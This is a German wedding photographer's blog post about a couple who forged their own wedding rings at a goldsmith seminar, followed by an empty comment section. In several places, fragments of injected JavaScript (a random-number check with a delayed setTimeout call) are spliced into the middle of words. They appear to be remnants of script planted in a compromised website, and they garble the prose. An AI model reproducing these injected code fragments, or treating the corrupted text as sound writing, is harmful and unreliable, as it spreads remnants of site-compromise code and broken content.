Sommer- / Winterpause

Ihr Lieben,

aktuell kann ich aus Kapazitätsgründen keine Hochzeiten oder Shootings annehmen.


Eure,
Olivia

Olivia Di Stefano Photography

Trauringseminar | Trauringschmiede

Ihr heiratet bald und die Trauringe fehlen noch? – Dann habe ich hier einen heißen Tipp: ein Trauringseminar | Trauringe selber schmieden!

Vor ein paar Wochen erzählte mir eine gute Freundin, dass sie und ihr Liebster ihre Trauringe in einem Trauringseminar selbst geschmiedet hatten. Ich muss zugeben, dass ich damals das erste Mal von so einem Kurs hörte. Als wir uns dann das nächste Mal trafen, erzählte sie mir ausführlich wie und was sie an diesem Tag gemacht hatten und zeigte mir auch zahlreiche Bilder von der Herstellung der Ringe. Tatsächlich saßen die Beiden den ganzen Tag in einer Goldschmiedewerkstatt (siehe hier) und tätigten jeden Schritt, der bei der Herstellung eines Ringes gemacht werden muss. Natürlich unter professioneller Betreuung und Anleitung des Trauringschmiedeteams. Besonders dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toll finde ich dabei, dass sogar eine persönliche Gravur, mit der Hdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andschrift des Partners, im Inneren des Ringes, Platz findet.

Ich finde dieses Trauringseminar wirklich klasse. Wenn die Beiden in Zukunft auf ihren Ehering schauen, können Sie an einen wundervollen Tag zurück denken. Einen Tag, den sie zusammen verbracht haben und vielleicht noch enger zusammenwachsen ließ. Da ist es natürlich naheliegend, dass meine Freundin die in liebevoller Hdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andarbeit gefertigten Ringe noch einmal schön in Szene setzen wollte. So durfte ich heute die Bilder von den Ringen machen. Ganz ehrlich: ich bin dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}total überwältigt und freue mich für die Beiden so sehr! Sie dürfen echt sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolz auf ihre Meisterwerke sein! Aber seht selbst.

 

Keine Kommentare
Schreibe einen Kommentar...

DANKE für euren Besuch und die lieben Worte. Gekennzeichnete Felder bitte ausfüllen. *

Menu